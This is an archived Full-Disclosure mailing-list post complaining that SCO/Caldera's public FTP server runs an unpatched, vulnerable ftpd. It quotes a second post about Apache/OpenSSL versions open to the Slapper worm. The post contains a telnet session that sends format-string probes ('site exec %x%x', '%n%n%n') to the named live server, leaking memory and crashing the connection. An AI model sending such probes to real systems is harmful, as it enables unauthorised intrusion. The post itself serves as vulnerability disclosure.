| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dotslash at snosoft.com (KF) Subject: SCO Web Site Vulnerable to Slapper? **** CALERA ARE YOU PAYING ATTENTION **** WAKE UP **** (normally I would not do this...) I am under the impression that either they probably don't care about their secuirty or they are ignorant... I reported this (see below) to them SEVERAL times... they use a vulnerable version of their own ftpd on their ftp server... can you say trojaned distribution site? They probably have not patched it because no one has produced a public exploit... they DO have a patch available however. > telnet ftpput.caldera.com 21 > Trying 216.250.128.33... > Connected to ftpput.caldera.com. > Escape character is '^]'. > 220 artemis FTP server (Version 2.1WU(1)) ready. > user anonymous > 331 Guest login ok, send e-mail address as password. > pass err@ > 230-Welcome to Caldera's FTP Archive Site > 230- ... > 230 Guest login ok, access restrictions apply. > site exec %x%x > 200-d2 > 200 (end of '%x%x') > site exec %n%n%n > Connection closed by foreign host. -KF ------------------------------------------------- subject: [Full-Disclosure] SCO Web Site Vulnerable to Slapper? integerdotonefourfivenine@...oo.com wrote: They seem to be running Apache/1.3.14 (Unix) mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux, which, if I have my facts straight, is vulnerable to <URL:http://www.cert.org/advisories/CA-2002-27.html>. Am I correct?
Powered by blists - more mailing lists